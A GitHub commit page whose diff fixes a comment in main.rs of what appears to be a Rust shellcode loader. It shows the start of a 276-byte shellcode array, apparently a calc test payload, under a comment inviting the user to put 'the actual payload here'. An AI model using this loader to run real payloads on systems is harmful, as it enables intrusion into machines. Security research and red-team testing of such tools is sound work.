Fix comment formatting in main.rs

This commit is contained in:
S3N4T0R
2026-03-05 09:44:41 -05:00
committed by GitHub
parent 28fafa8331
commit d38cb8eeaa
@@ -451,7 +451,7 @@ fn main() {
// ===== SHELLCODE =====
// Put the actual payload here, and use calc here for testing purposes only.
// Put the actual payload here and use calc here for testing purposes only.
let shellcode: [u8; 276] = [
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,